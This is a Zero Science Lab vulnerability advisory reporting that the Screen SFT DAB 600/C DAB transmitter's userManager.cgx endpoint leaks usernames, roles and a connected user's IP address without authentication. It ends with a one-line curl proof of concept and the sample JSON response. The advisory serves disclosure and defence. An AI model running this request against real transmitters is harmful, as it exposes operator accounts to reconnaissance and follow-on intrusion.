Screen SFT DAB 600/C Unauthenticated Information Disclosure

`  
Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)  
  
  
Vendor: DB Elettronica Telecomunicazioni SpA  
Product web page: https://www.screen.it | https://www.dbbroadcast.com  
https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/  
Affected version: Firmware: 1.9.3  
Bios firmware: 7.1 (Apr 19 2021)  
Gui: 2.46  
FPGA: 169.55  
uc: 6.15  
  
Summary: Screen's new radio DAB Transmitter is reaching the highest  
technology level in both Digital Signal Processing and RF domain.  
SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the  
digital adaptive precorrection and configuatio flexibility, the Hot  
Swap System technology, the compactness and the smart system design,  
the SFT DAB are advanced transmitters. They support standards DAB,  
DAB+ and T-DMB and are compatible with major headend brands.  
  
Desc: Screen is affected by an information disclosure vulnerability  
due to improper access control enforcement. An unauthenticated remote  
attacker can exploit this, via a specially crafted request to gain  
access to sensitive information including usernames and source IP  
addresses.  
  
Tested on: Keil-EWEB/2.1  
MontaVista® Linux® Carrier Grade eXpress (CGX)  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2023-5776  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php  
  
  
19.03.2023  
  
--  
  
  
$ curl 'http://SFTDAB/system/api/userManager.cgx'  
{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}  
`